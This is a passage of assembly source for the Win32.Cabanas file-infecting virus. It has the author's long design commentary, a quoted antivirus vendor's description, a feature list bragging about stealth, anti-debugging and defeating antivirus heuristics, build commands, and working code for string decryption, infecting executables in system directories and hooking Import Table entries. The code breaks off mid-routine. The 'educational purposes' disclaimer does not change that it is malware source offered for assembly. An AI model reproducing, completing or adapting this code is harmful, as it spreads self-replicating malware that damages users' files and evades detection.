Cabanas then closes +; the file, blanks the file attribute of the file with SetFileAttributeA API +; and saves the original attributes for later use. This means the virus is +; not stopped by the "Read Only" attribute. Then again, it opens and maps +; the possible host file in read/write mode. +; +; Next it searches for the GetModuleHandleA, GetModuleHandleW and +; GetProcAddress API imports in the host Import Table and calculates +; pointers to the .idata section. Then it calls the routine which +; patches the virus image into the file. +; +; This routine first checks that the .idata section has MEM_WRITE +; characteristics. If not it sets this flag on the section, but only if +; this section is not located in an executable area. This prevents the +; virus from turning on suspicious flags on the code section, triggered +; by some heuristic scanner. +; +; Then it goes to the entry point of the image and replaces five bytes +; with a FAR JMP instruction which will point to the original end of the +; host. After that it checks the relocation table. This is because some +; relocations may overwrite the FAR JMP at the entry point. If the +; relocation table size is not zero the virus calls a special routine +; to search for such relocation entries in the .reloc area. It clears +; the relocation type on the relocation record if it points into the FAR +; JMP area, thus this relocation will not take into account by the loader. +; The routine also marks the relocation, thus Cabanas will be able to +; relocate the host later on. Then it crypts all the information which has +; to be encrypted in the virus body. Including the table which holds the +; original 5 bytes from the entry point and its location. +; +; Next the virus calculates the special checksum for self checking purposes +; and saves this to the time stamp field of the PE header. When everything +; is ready, the virus calculates the full new size of the file and makes +; this value dividable by 101. 
The real virus code is around 3000 bytes +; only but the files will grow with more bytes, because of this. Cabanas +; has a very important trick here. The virus does not create a new section +; header to hold its code, but patches the last section header in the file +; (usually .reloc) to grow the section body large enough to store the virus +; code. This makes the infection less risky and less noticeable. +; +; Then the virus changes the SizeOfImage field in the PE header to reflect +; the changes made to the last section in the file, then unmaps and closes +; the file. Next it truncates the file at the previously calculated size +; and restores the original time and date stamp. Finally Cabanas resets the +; original attribute of the file. When all the possible files have been +; checked for infection, Cabanas is ready to go memory resident. +; +; +; 1.3. Rebuild the host, Hook API functions and Go memory resident +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; The next phase is to rebuild the host program. The virus locates an +; internal parameter block which consists of the previously encrypted code +; from the host (5 bytes) and writes back the 5 original bytes at the entry +; point. After this, it relocates the code area if needed, by searching in +; the .reloc section for marked relocation entries. Next the virus hooks +; API functions and goes memory resident. +; +; The API hooking technique is based on the manipulation of the Import +; Table. Since the host program holds the addresses of imported functions +; in its .idata section, all the virus has to do is to replace those +; addresses to point to its own API handlers. +; +; To make those calculations easy, the virus opens and maps the infected +; program. Then it allocates memory for its per-process part. The virus +; allocates a 12232 bytes block and copies itself into this new allocated +; area. 
Then it searches for all the possible function names it wants to +; hook: GetProcAddress, GetFileAttributesA, GetFileAttributesW, MoveFileExA, +; MoveFileExW, _lopen, CopyFileA, CopyFileW, OpenFile, MoveFileA, MoveFileW, +; CreateProcessA, CreateProcessW, CreateFileA, CreateFileW, FindClose, +; FindFirstFileA, FindFirstFileW, FindNextFileA, FindNextFileW, SetFileAttrA, +; SetFileAttrW. Whenever it finds one of the latter APIs, it saves the +; original address to its own JMP table and replaces the .idata section's +; DWORD (which holds the original address of the API) with a pointer to its +; own API handlers. Finally the virus closes and unmaps the host and starts +; the application, by jumping into the original entry point in the code +; section. +; +; Some Win32 applications however may not have imports for some of these +; file related APIs, they can rather retrieve their addresses by using +; GetProcAddress and call them directly, thus the virus would be unable +; to hook this calls. Not so fast. The virus also hooks GetProcAddress +; for a special purpose. GetProcAddress is used by most applications. +; When the application calls GetProcAddress the virus new handler first +; calls the original GetProcAddress to get the address of the requested +; API. Then it checks if the Module Handle parameter is from KERNEL32 and +; if the function is one of the KERNEL32 APIs that the virus wants to hook. +; If so, the virus returns a new API address which will point into its +; NewJMPTable. Thus the application will still get an address to the virus +; new handler in such cases as well. +; +; +; 1.4. Stealth and fast infection capabilities +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; Cabanas is a semi-stealth virus: during FindFirstFileA, FindFirstFileW, +; FindNextFileA and FindNextFileW, the virus checks for already infected +; programs. 
If the program is not infected the virus will infect it, +; otherwise it hides the file size difference by returning the original +; size for the host program. During this, the virus can see all the file +; names the application accesses and infects every single clean file. +; +; Since the CMD.EXE (Command Interpreter of Windows NT) is using the above +; APIs during a DIR command, every non infected file will be infected (if +; the CMD.EXE was infected previously by Win32.Cabanas). The virus will +; infect files during every other hooked API request as well. +; +; Apart from the encrypted API names strings, the virus also contains the +; following copyright message: +; +; (c) Win32.Cabanas v1.0 by jqwerty/29A. +; +; +; 1.5. Conclusion +; 哪哪哪哪哪哪哪 +; Win32.Cabanas is a very complex virus with several features new in Win32 +; based systems. It shows quite interesting techniques that can be used in +; the near future. It demonstrates that a Windows NT virus should not have +; any Windows 95 or Windows NT especific functionality in order to work on +; any Win32 system. The "per-process" residency technique also shows a +; portable viable solution to avoid known compatibility issues between +; Windows 95 and Windows NT respecting their low level resident driver +; implementations. Virus writers can use these techniques and their +; knowledge they have had on Windows 95 to come to a more robust platform. +; So far Win32.Cabanas has made this first step. +; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8 +; +; +; 2. Shortcutz +; 哪哪哪哪哪哪 +; (*) http://www.dials.ccas.ru/inf/cabanas.htm +; +; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8 +; Win32.Cabanas: A brief description +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; Igor A. Daniloff +; +; Win32.Cabanas is the first known virus that infects files under Microsoft +; 32-bit Windows operating systems (Win32s/Windows 95/Windows NT). 
Not only +; is it capable of infecting PortableExecutable files, but also remains +; resident in the current session of an infected program in all these +; Windows systems. +; +; The viruses specifically designed for Windows 95 thus far could not +; properly infect files in Windows NT. Although files of Windows 95 and +; Windows NT have identical PE format, certain fields in their PE headers +; are different. Therefore, for infecting files under Windows NT, the PE +; header must be modified appropriately; otherwise Windows NT would display +; an error message in the course of loading the file. Furthermore, viruses +; encounter certain problems in determining the base addresses of WIN32 +; KERNEL API in the memory, because KERNEL32.DLL in Windows 95 and Windows +; NT are located at different memory addresses. But Win32.Cabanas smartly +; handles these problems. On starting an infected file, the virus gets +; control, unpacks and decrypts its table of names of WIN32 KERNEL API +; procedures that are needed in the sequel, and then determines the base +; address of KERNEL32.DLL and the addresses of all necessary WIN32 KERNEL +; API functions. +; +; While infecting a file, Win32.Cabanas finds the names of GetModuleHandleA, +; GetModuleHandleW, and GetProcAddress functions from the Import Table and +; stores in its code the offsets of the addresses of these procedures in the +; Import Table (in the segment .idata, as a rule). If the names of these +; procedures are not detectable, Win32.Cabanas uses a different undocumented +; method of finding the base address of KERNEL32 and the addresses of WIN32 +; KERNEL API. But there is a bug in this undocumented method; therefore the +; method is inoperative under Windows NT. If the addresses of +; GetModuleHandleA or GetModuleHandleW functions are available in the Import +; Table of the infected file, the virus easily determines the WIN32 KERNEL +; API addresses through the GetProcAddress procedure. 
If the addresses are +; not available in the Import Table, the virus craftily finds the address of +; GetProcAddress from the Export Table of KERNEL32. As already mentioned, +; this virus mechanism is not operative under Windows NT due to a bug, and, +; as a consequence, the normal "activity" of the virus is disabled. This is +; the only serious bug that prevents the proliferation of Win32.Cabanas +; under Windows NT. On the contrary, in Windows 95 the virus "feels +; completely at home" and straightforwardly (even in the absence of the +; addresses of GetModuleHandleA or GetModuleHandleW) determines the base +; address of KERNEL32.DLL and GetProcAddress via an undocumented method. +; +; Using the GetProcAddress function, Win32.Cabanas can easily get the +; address of any WIN32 KERNEL API procedure that it needs. This is precisely +; what the virus does: it gets the addresses and stores them. +; +; Then Win32.Cabanas initiates its engine for infecting EXE and SCR PE-files +; in \WINDOWS, \WINDOWS\SYSTEM, and the current folder. Prior to infecting a +; file, the virus checks for a copy of its code through certain fields in +; the PE header and by the file size, which for an infected must be a +; multiple of 101. As already mentioned, the virus searches for the names of +; GetModuleHandleA, GetModuleHandleW or GetProcAddress in the Import Table +; and saves the references to their addresses. Then it appends its code at +; the file end in the last segment section (usually, .reloc) after modifying +; the characteristics and size of this section. Thereafter, the virus +; replaces the five initial bytes of the original entry point of the code +; section (usually, .text or CODE) by a command for transferring control to +; the virus code in the last segment section (.reloc). For this purpose, the +; virus examines the relocation table (.reloc) for finding some element in +; the region of bytes that the virus had modified. 
If any, the virus +; "disables" the reference and stores its address and value for restoring +; the initial bytes of the entry point at the time of transfer of control +; to the host program and, if necessary, for appropriately configuring the +; relocation. +; +; After infecting all files that yield to infection in \WINDOWS, \WINDOWS\ +; SYSTEM, and in the current folder, the virus plants a resident copy into +; the system and "intercepts" the necessary system functions. Using +; VirtualAlloc, the virus allots for itself 12232 bytes in the memory and +; plants its code there. Then it tries to "intercept" the following WIN32 +; KERNEL API functions: GetProcAddress, GetFileAttributesA, +; GetFileAttributesW, MoveFileExA, MoveFileExW, _loopen, CopyFileA, +; CopyFileW, OpenFile, MoveFileA, MoveFileW, CreateProcessA, CreateProcessW, +; CreateFileA, CreateFileW, FindClose, FindFirstFileA, FindFirstFileW, +; FindNextFileA, FindNextFileW, SetFileAttrA, and SetFileAttrW. The virus +; "picks up" the addresses of these functions from the Import Table, and +; writes the addresses of its handlers in the Import Table. On failing to +; "intercept" certain necessary functions, the virus, when the host program +; calls for the GetProcAddress function, verifies whether this function is +; necessary for the host program, and returns the address of the virus +; procedure to host program if necessary. When a program calls for certain +; functions that have been "intercepted" by Win32.Cabanas, the file +; infection engine and/or the stealth mechanism are\is initialized. Thus, +; when FindFirstFileA, FindFirstFileW, and FindNextFileA or FindNextFileW +; functions are called, the virus may infect the file which is being +; searched and hide the increase in the infected file size. 
+; +; Win32.Cabanas cannot be regarded as a "true resident" virus, because it +; "intercepts" system functions and installs its copy in a specific memory +; area only in the current session of an infected program. But what will +; happen on starting, for example, an infected Norton Commander for Windows +; 95 or Command Interpreter for Windows NT? Or a resident program? Indeed, +; Win32.Cabanas will also "work hard" side by side with such a program until +; it is terminated. +; +; Win32.Cabanas contains an encrypted text string +; "(c) Win32.Cabanas v1.0 by jqwerty/29A" +; +; (c) 1997 DialogueScience, Inc., Moscow, Russia. All rights reserved. +; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8 +; +; +; 3. Main featurez +; 哪哪哪哪哪哪哪哪 +; * Platformz: WindowsNT, Windows95, Win32s, i.e. all Win32 platformz. +; * Residency: Yes, "Per Process", workin on all Win32 systemz. +; * Non-Residency: Yes, direct action, infects PEz before goin resident. +; * Stealth: Yes, size stealth of inf.filez (F-Potatoe95 fooled). +; * AntiDebuging: Yes, TD32 or any other "aplication" level debuger +; generates an exception when debugin an infected +; aplication. This obviosly doesnt aply for Soft-ICE +; for Windows95, a big monster. +; * AntiHeuristicz: Yes, inf.filez have no obvious symptomz of infection. +; Other Win95 virusez tend to "mark" the PE header so +; they are easily noticeable. See: Other featurez (e). +; * AntiAntivirus: Yes, disinfection of inf.filez is almost *imposible*. +; * Fast infection: Yes, filez are infected when accesed for any reason. +; * Polymorphism: No, the poly engine was stripped and removed on purpose. +; * Other featurez: +; (a) The EntryPoint field in the PE hdr is not modified. +; (b) Win32 file API functionz are hooked for infection and +; stealth purposez but also for platform compatibility. +; (c) Use of the Win32 "File-Maping" API functionz, thus +; implementin "Memory-Mapped Filez". 
No more "ReadFile", +; "SetFilePointer", "WriteFile"... it was about time. +; (d) Absolutely no use of absolute adressez in sake of +; compatibility with other future Win32 releasez. +; (e) The SHAPE AV program sucks, but sadly it was the best +; thing detectin PE infected filez heuristicaly. Well +; almost as it didnt triger a single flag on this one :) +; (f) Use of "Structured Exception Handling" (SEH) in those +; critical code fragmentz that could generate GP faultz, +; i.e. exceptionz are intercepted and handled properly. +; (g) Unicode suport. This babe really works in NT. No lie. +; +; +; 4. Who was Cabanas? +; 哪哪哪哪哪哪哪哪哪 +; Gonzalo Cabanas used to be a daydream believer. We shared several thingz +; in comon, heard same R.E.M music style, wore the same ragged blue jeanz, +; and behaved like kidz everywhere we went together, putin tackz on the tea- +; cher's chair, stealin some classmate's lunch and so on. We even liked the +; same girlz, which explains why we sometimez ended up punchin each other's +; face from time to time. However, u could find us the next day, smoking a- +; round by the skoolyard as if nothin had ever hapened. We were the best +; friendz ever. I know this virus wont return him back to life, nor "will do +; him justice", however, i still wanted to somewhat dedicate this program in +; his honor. +; +; +; 5. Greetz +; 哪哪哪哪 +; The greetz go to: +; +; Gonzo Cabanas ......... Hope to see u somewhere in time.. old pal! +; Murkry ................ Whoa.. i like yer high-tech ideaz budie! +; VirusBuster/29A ....... U're the i-net man pal.. keep doin it! +; Vecna/29A ............. Keep up the good work budie.. see ya! +; l- .................... Did ya ask for some kick-ass lil' creature? X-D +; Int13 ................. Hey pal.. u're also a southamerican rocker! ;) +; Peter/F-Potatoe ....... Yer description rulez.. Mikko's envy shines! +; DV8 (H8), kdkd, etc ... Hey budiez.. now where da hell are u? +; GriYo, Sandy/29A ...... 
Thx for yer patience heh X-D +; +; +; 6. Disclaimer +; 哪哪哪哪哪哪 +; This source code is for educational purposez only. The author is not res- +; ponsable for any problemz caused due to the assembly of this file. +; +; +; 7. Compiling it +; 哪哪哪哪哪哪哪 +; tasm32 -ml -m5 -q -zn cabanas.asm +; tlink32 -Tpe -c -x -aa cabanas,,, import32 +; pewrsec cabanas.exe +; +; +; (c) 1997 Jacky Qwerty/29A. + + +.386p ;generate 386+ protected mode instructionz +.model flat ;no segmentz and a full 32-bit offset.. what a dream ;) + +;Some includez containin very useful structurez and constantz for Win32 + +include Useful.inc +include Win32API.inc +include MZ.inc +include PE.inc + +;Some equ's needed by the virus + +nAPIS = 1*1024 ;size of jump table holdin hooked APIz +nHANDLEZ = 2*1024 + 512 ;size of Handlez table +nPATHNAMEZ = 4*1024 + 512 ;size of PathNamez table + +extrn GetModuleHandleA :proc ;APIz used durin first generation only +extrn GetProcAddress :proc + +.data + db ? ;some dummy data so tlink32 dont yell + +.code + +;Virus code starts here + +v_start: + + call get_base + +code_table: + + dd 12345678h ;host RVA entry point + dw 1 ;number of bytez + db ? ;bytez to patch + dw 0 ;end of parameter block + +code_start: + +;Packed APIz needed by the virus. 
They will travel in packed/encrypted form + +ve_stringz: + +veszKernel32 db 'KERNEL32',0 +veszGetModuleHandleA db 'GetModuleHandleA' +veszGetModuleHandleW db 80h,17 + +eExts db 'fxEtcR',0 ;list of file extensionz + +veszGetProcAddress db 'GetProcAddress',0 +veszGetFileAttributesA db 'Ge','t'+80h,'AttributesA' +veszGetFileAttributesW db 80h,19 +veszMoveFileExA db 'Mov','e'+80h,'ExA' +veszMoveFileExW db 80h,12 +vesz_lopen db '_lopen',0 +veszCopyFileA db 'Cop','y'+80h,'A' +veszCopyFileW db 80h,10 +veszOpenFile db 'Ope','n'+80h,0 +veszMoveFileA db 'Mov','e'+80h,'A' +veszMoveFileW db 80h,10 +veszCreateProcessA db 'CreateProcessA' +veszCreateProcessW db 80h,15 +veszCreateFileA db 'Creat','e'+80h,'A' +veszCreateFileW db 80h,12 +veszFindClose db 'FindClose',0 +veszFindFirstFileA db 'FindFirs','t'+80h,'A' +veszFindFirstFileW db 80h,15 +veszFindNextFileA db 'FindNex','t'+80h,'A' +veszFindNextFileW db 80h,14 +veszSetFileAttributesA db 'Se','t'+80h,'AttributesA' +veszSetFileAttributesW db 80h,19 +veszCloseHandle db 'CloseHandle',0 +veszCreateFileMappingA db 'Creat','e'+80h,'MappingA',0 +veszMapViewOfFile db 'MapViewO','f'+80h,0 +veszUnmapViewOfFile db 'UnmapViewO','f'+80h,0 +veszSetFilePointer db 'Se','t'+80h,'Pointer',0 +veszSetEndOfFile db 'SetEndO','f'+80h,0 +veszSetFileTime db 'Se','t'+80h,'Time',0 +veszGetWindowsDirectory db 'GetWindowsDirectoryA',0 +veszGetSystemDirectory db 'GetSystemDirectoryA',0 +veszGetCurrentProcess db 'GetCurrentProcess',0 +veszGetModuleFileName db 'GetModul','e'+80h,'NameA',0 +veszWriteProcessMemory db 'WriteProcessMemory',0 +veszWideCharToMultiByte db 'WideCharToMultiByte',0 +veszVirtualAlloc db 'VirtualAlloc',0 + +eEndOfFunctionNamez db 0 + +;Copyright and versionz + +eszCopyright db "(c) Win32.Cabanas v1.1 by jqwerty/29A.",0 + +ve_string_size = $ - ve_stringz + +get_base: + + mov ecx,ve_string_size ;get size of packed/encrypted stringz + mov esi,[esp] ;get pointer to packed/encrypted stringz + xor ebx,ebx + mov eax,esi + sub esi,ecx + cld + sub 
dword ptr [esp],code_table - seh_fn + add esi,[eax - 4] + push dword ptr fs:[ebx] ;set SEH frame.. ever seen FS in action? X-D + lea edi,[esi + pCodeTable - ve_stringz] + stosd ;save pointer to code_table + add eax,12345678h +delta_host = dword ptr $ - 4 + stosd ;save actual host base adress + mov eax,esi + stosd ;save pointer to virus start + +ebp_num = ddGetProcAddress + 7Fh +tmp_edi = pcode_start + 4 + + mov fs:[ebx],esp + pushad + xchg eax,[ebx - 2] ;go away lamerz and wannabeez.. + db 2Dh + +seh_rs: sub edi,tmp_edi - v_stringz ;get pointer to KERNEL32 API name + pop eax + push edi ;pass the pointer twice + push edi + +decrypt_stringz: ;decrypt/unpack API namez and other stringz + + lodsb + rol al,cl + xor al,0B5h + jns d_stor + add al,-80h + jnz d_file + stosb ;expand/unpack unicode API name + xor eax,eax + lodsb + push esi + xchg ecx,eax + mov esi,edx + rep movsb + xchg ecx,eax + sub byte ptr [edi - 2],'A'-'W' + pop esi + jmp d_updt +d_file: stosb + xor eax,eax + sub eax,-'eliF' ;expand to 'File' where aplies + stosd + cmp al,? + org $ - 1 +d_stor: stosb + jnz d_loop +d_updt: mov edx,edi +d_loop: loop decrypt_stringz ;get next character + + call MyGetModuleHandleA ;get KERNEL32 base adress (first try) + pop esi + jnz gotK32 ;jump if found + sub ecx,ecx + xor eax,eax + mov cl,9 + push edi + cld + +copy_K32W: ;make unicode string for KERNEL32 + + lodsb + stosw + loop copy_K32W + call MyGetModuleHandleW ;get KERNEL32 base adress (second try) + jnz gotK32 ;jump if found + call MyGetModuleHandleX ;get KERNEL32 base adress (third try) + jnz gotK32 ;jump if found + +quit_app: + + pop eax ;shit.. 
KERNEL32 base adress not found + ret ;try to quit aplication via an undocumented way + + db 67h ;some prefix to confuse lamerz +seh_fn: mov eax,[esp.EH_EstablisherFrame] + lea esp,[eax - cPushad] + popad + xor eax,eax + lea ebp,[edi + ebp_num - tmp_edi] + pop dword ptr fs:[eax] ;remove SEH frame + jmp seh_rs + +gotK32: mov [ebp + K32Mod - ebp_num],eax ;store KERNEL32 base adress + cmp dword ptr [ebp + ddGetProcAddress - ebp_num],0 + xchg ebx,eax + jnz find_APIs ;got RVA pointer to GetProcAdress API? + lea esi,[ebp + vszGetProcAddress - ebp_num] + call MyGetProcAddressK32 ;no, get adress of GetProcAdress directly + jecxz find_APIs + lea eax,[ebp + ddGetProcAddress2 - ebp_num] + mov [eax],ecx + sub eax,[ebp + phost_hdr - ebp_num] + mov [ebp + ddGetProcAddress - ebp_num],eax + +find_APIs: ;find file related API adressez from KERNEL32.. + + lea esi,[ebp + FunctionNamez - ebp_num] + lea edi,[ebp + FunctionAdressez - ebp_num] + +GetAPIAddress: + + call MyGetProcAddressK32 ;get API adress + jecxz quit_app + cld + xchg eax,ecx + stosd ;save retrieved API adress + @endsz ;point to next API name + cmp [esi],al ;end of API namez reached? + jnz GetAPIAddress ;no, get next API adress + + lea ebx,[ebp + Process_Dir - ebp_num] + lea edi,[ebp + PathName - ebp_num] + push 7Fh + push edi + call [ebp + ddGetWindowsDirectoryA - ebp_num] + call ebx ;infect filez in WINDOWS directory + push 7Fh + push edi + call [ebp + ddGetSystemDirectoryA - ebp_num] + call ebx ;infect filez in SYSTEM directory + xor eax,eax + mov byte ptr [edi],'.' + inc eax + call ebx ;infect filez in current directory + +build_host: ;rebuild the host.. 
+ + mov esi,[ebp + pCodeTable - ebp_num] ;get code table of host + mov ebx,[ebp + phost_hdr - ebp_num] ;get host base adress + cld + lodsd + add eax,0B2FD26A3h ;decrypt original entry point RVA +add_1st_val = dword ptr $ - 4 + xchg edi,eax + add edi,ebx + push edi ;save entry point for l8r retrieval + +get_count: + + call [ebp + ddGetCurrentProcess - ebp_num] ;get pseudo-handle for current process + xchg ecx,eax + cld + lodsw ;get number of bytes to copy + cwde + xchg ecx,eax + mov edx,ecx + push ecx ;push parameterz to WriteProcessMemory API + push eax + push esp + push ecx + push esi + push edi + push eax + +decrypt_hostcode: ;decrypt the chunk of original host code previosly encrypted.. + + lodsb + xor al,06Ah +xor_2nd_val = byte ptr $ - 1 + rol al,cl + mov [esi-1],al + loop decrypt_hostcode + sub ecx,12345678h +old_base = dword ptr $ - 4 + add ecx,ebx ;has host base adress been relocated? + jz write_chunk ;no, relocation fix not necesary.. jump + + ;fix code pointed to by one or more nulified relocationz.. + + pushad ;get RVA start of relocation section.. + lea esi,[ebx.MZ_lfanew] + sub edi,ebx + add esi,[esi] + mov ecx,[esi.NT_OptionalHeader \ ;get size of relocation dir. + .OH_DirectoryEntries \ + .DE_BaseReloc \ + .DD_Size \ + -MZ_lfanew] + jecxz _popad + mov esi,[esi.NT_OptionalHeader \ ;get RVA to relocation section + .OH_DirectoryEntries \ + .DE_BaseReloc \ + .DD_VirtualAddress \ + -MZ_lfanew] + call redo_reloc ;pass adress of fix_relocs label as a parameter + +fix_relocs: ;process relocation block and look for nulified relocationz.. + + lodsw ;get relocation item + cwde + dec eax + .if sign? + jnc f_next_reloc ;if first item, jump to get next relocation item + .endif + test ah,mask RD_RelocType shr 8 ;is relocation nulified? + jnz f_next_reloc ;no, jump to get next relocation item + lea eax,[eax + ebx + 5] + cmp edi,eax ;relocation item points inside chunk of code? 
+ jnc f_next_reloc ;no, jump to get next relocation item + add eax,-4 + cmp eax,edx + jnc f_next_reloc ;no, jump to get next relocation item + + ;relocation item is pointing inside chunk of code.. add delta to fix it.. + + pushad + mov ebx,[esp.(4*Pshd).cPushad.Pushad_ebx] ;get actual host base adress + mov ebp,[ebx + edi - 4] + mov ecx,[esp.(3*Pshd).(2*cPushad).Arg3] ;get pointer to chunk of code inside code table + mov ebx,[ebx + edx] + xchg ebp,[ecx - 4] + sub ecx,edi + mov esi,[esp.(4*Pshd).cPushad.Pushad_ecx] ;get relocation delta to add + xchg ebx,[edx + ecx] + add [eax + ecx],esi ;add delta.. (aack! damned relocationz..) + mov [edx + ecx],ebx + popad + clc + +f_next_reloc: + + loop fix_relocs ;get next relocation item + ret + +redo_reloc: + + call get_relocs +_popad: popad + +write_chunk: + + call [ebp + ddWriteProcessMemory - ebp_num] ;write chunk of code to the code section + xchg ecx,eax + pop edx + cld + pop eax + jecxz n_host ;if error, jump and try to stay resident without jumpin back to host + xor edx,eax + lodsw ;get pointer to next chunk of code to patch, if any + jnz n_host ;if error, jump and try to stay resident without jumpin back to host + cwde + xchg ecx,eax + sub edi,ecx + jecxz go_resident ;no more chunkz, jump and try to stay resident, then jump back to host + jmp get_count ;jump and patch the next chunk +n_host: pop eax ;unwind return adress, an error occured, cant jump to host :( + +go_resident: + + lea esi,[ebp + FindData - ebp_num] + push MAX_PATH + push esi + push ecx + call [ebp + ddGetModuleFileName - ebp_num] ;get host filename + xchg ecx,eax + lea ebx,[ebp + jmp_addr_table - ebp_num] ;get pointer to start of jump adress table + jecxz g_host + call Open&MapFile ;open host filename and memory-map it +g_host: jecxz jmp_host ;if error, jump back to host + push PAGE_EXECUTE_READWRITE + push MEM_COMMIT or MEM_RESERVE or MEM_TOP_DOWN + push (virtual_end2 - code_start + 3) and -4 + push esi ;NULL ;let OS choose memory adress + call [ebp + 
ddVirtualAlloc - ebp_num] ;allocate enough memory for virus code and bufferz + lea ecx,[ebp + FunctionNamez2 - ebp_num] ;get pointer to start of function namez to hook + mov edi,non_res - code_start + xchg ecx,eax ;get size of new allocated block + lea esi,[ecx + PathNamez - code_start] + jecxz close_jmp_host ;if error on VirtualAlloc, close file and jump to host + xchg edi,ecx ;get target adress of new allocated block + mov [ebp + pPathNamez - ebp_num],esi ;initialize pointer to store future pathnamez retrieved by Find(First/Next)File(A/W) + mov esi,edi + xchg [ebp + pcode_start - ebp_num],esi ;get source adress of virus code and store new target adress as new source adress + lea edx,[edi + ecx + jmp_table_size + 1] + mov [ebp + pNewAPIs - ebp_num],edx ;initialize pointer to store hooked APIs in the new jump table + cld + rep movsb ;copy virus code to new allocated block + mov [esi],cl ;force a null to mark the end of function namez to hook + pop ecx ;get start of memory-maped file + inc edi ;get pointer to NewAPItable + push ecx + +hook_api: ;hook API functionz, retrieve old API adress and build new API entry into jump table.. + + pushad + call IGetProcAddressIT ;get RVA pointer of API function inside import table + test eax,eax + jz next_api_hook ;if not found, jump and get next API name + add eax,[ebp + phost_hdr - ebp_num] ;convert RVA to real pointer by addin the actual host base adress + mov edx,esp + push eax + push esp + xchg esi,eax + mov al,0B8h ;build "mov eax,?" instruction into jump table + push 4 + push edx + stosb + call [ebp + ddGetCurrentProcess - ebp_num] + push esi + push eax + cld + movsd ;get and copy old API adress into jump table + call [ebp + ddWriteProcessMemory - ebp_num] ;set our API hook + cld + mov al,0E9h ;build "jmp ?" 
instruction to jump to new API handler + pop edx + pop ecx + stosb + movzx eax,word ptr [ebx] ;build relative offset to new API handler + sub eax,edi + add eax,[ebp + pcode_start - ebp_num] + stosd + push edi + +next_api_hook: + + popad + inc ebx + xchg esi,eax + @endsz ;get pointer to next API name + inc ebx + cmp [esi],al ;check end of API namez to hook + xchg eax,esi + jnz hook_api ;jump and get next API, if there are more APIz to hook + +close_jmp_host: + + call Close&UnmapFile ;close and unmap host file + +jmp_host: + + cld + pop eax + jmp eax ;jmp to host.. or try to quit aplication if an error ocurred while patchin the code section + +NewGetProcAddr: ;new GetProcAddress API entry point.. hook wanted API functionz from KERNEL32.. + + call APICall@n_2 ;call old GetProcAdress API and retrieve API adress in EAX + pushad + mov ecx,[esp.cPushad.Arg1] ;get module handle/base adress + call get_ebp ;get EBP to reference internal variablez correctly + xchg ecx,eax + jecxz end_getproc ;get out if retrieved API adress is zero + sub eax,[ebp + K32Mod - ebp_num] ;is it KERNEL32 base adress? + jnz end_getproc ;no, get out + lea edx,[ebp + jmp_addr_table - 2 - ebp_num] ;yea its KERNEL32, get pointer to start of jump table + lea edi,[ebp + FunctionNamez2 - 1 - ebp_num] ;get pointer to API function namez to hook + cld + +n_gproc_next_str: ;search specified API function name from the list of posible API namez to hook.. + + inc edx + scasb ;get adress to next API function name + jnz $ - 1 + mov esi,[esp.cPushad.Arg2] ;get pointer to specified API function name + inc edx + scasb + jz end_getproc ;if end of API namez reached, get out + dec edi + +n_gproc_next_chr: + + cmpsb ;do API namez match? + jnz n_gproc_next_str ;no, get next API name + dec edi + scasb + jnz n_gproc_next_chr + +n_gproc_apis_match: ;API namez match, we need to hook the API.. 
+ + lea ebx,[ebp + NewAPItable + nAPIS - 10 - ebp_num] ;get top of jump table + mov edi,[ebp + pNewAPIs - ebp_num] ;get current pointer to build new API entry + cmp ebx,edi ;check if jump table is full + jc end_getproc ;get out if full + push edi + sub al,-0B8h ;build "mov eax,?" instruction into jump table + stosb + pop eax + xchg eax,[esp.Pushad_eax] ;retrieve old API adress and swap with the new API adress + stosd + mov al,0E9h ;build "jmp ?" instruction to jump to new API handler + stosb + movzx eax,word ptr [edx] ;build relative offset to new API handler + sub eax,edi + add eax,[ebp + pcode_start - ebp_num] + stosd + mov [ebp + pNewAPIs - ebp_num],edi ;update pointer to next API entry in the jump table + +end_getproc: + + popad + ret (2*Pshd) ;return to caller + +jmp_addr_table: ;adress table.. contains relative offsetz to new API handlerz.. + + dw NewGetProcAddr - code_start - 4 + dw NewGetFileAttrA - code_start - 4 + dw NewGetFileAttrW - code_start - 4 + dw NewMoveFileExA - code_start - 4 + dw NewMoveFileExW - code_start - 4 + dw New_lopen - code_start - 4 + dw NewCopyFileA - code_start - 4 + dw NewCopyFileW - code_start - 4 + dw NewOpenFile - code_start - 4 + dw NewMoveFileA - code_start - 4 + dw NewMoveFileW - code_start - 4 + dw NewCreateProcessA - code_start - 4 + dw NewCreateProcessW - code_start - 4 + dw NewCreateFileA - code_start - 4 + dw NewCreateFileW - code_start - 4 + dw NewFindCloseX - code_start - 4 + dw NewFindFirstFileA - code_start - 4 + dw NewFindFirstFileW - code_start - 4 + dw NewFindNextFileA - code_start - 4 + dw NewFindNextFileW - code_start - 4 + dw NewSetFileAttrA - code_start - 4 + dw NewSetFileAttrW - code_start - 4 + +jmp_table_size = $ - jmp_addr_table + +NewSetFileAttrW: ;new API handlerz (unicode version).. +NewCreateFileW: +NewCreateProcessW: +NewMoveFileW: +NewCopyFileW: +NewMoveFileExW: +NewGetFileAttrW: +CommonProcessW: + + test al,? 
;clear carry (unicode version) + org $ - 1 + +NewSetFileAttrA: ;new API handlerz (ansi version).. +NewCreateFileA: +NewCreateProcessA: +NewMoveFileA: +NewOpenFile: +NewCopyFileA: +New_lopen: +NewMoveFileExA: +NewGetFileAttrA: +CommonProcessA: + + stc ;set carry (ansi version) + pushad + call get_ebp2_Uni2Ansi ;get EBP to reference internal variablez correctly and convert unicode string to ansi (for unicode version APIz) + jecxz jmp_old_api + call findfirst ;get atributez, size of file and check if it exists + jz jmp_old_api + dec eax + push eax ;save search handle + @copysz ;copy filename to an internal buffer + call Process_File2 ;try to infect file.. + +NCF_close: + + call [ebp + ddFindClose - ebp_num] ;close file search + +jmp_old_api: + + popad + jmp eax ;jump to original API adress + +NewFindFirstFileW: ;new findfirst API handler.. infect files, stealth (unicode version) + + test al,? ;clear carry (unicode version) + org $ - 1 + +NewFindFirstFileA: ;new findfirst API handler.. infect files, stealth (ansi version) + + stc ;set carry (ansi version) + call APICall@n_2 ;call old findfirst API + pushad + inc eax ;if any error, get out + jz go_ret_2Pshd + dec eax + jz go_ret_2Pshd + call 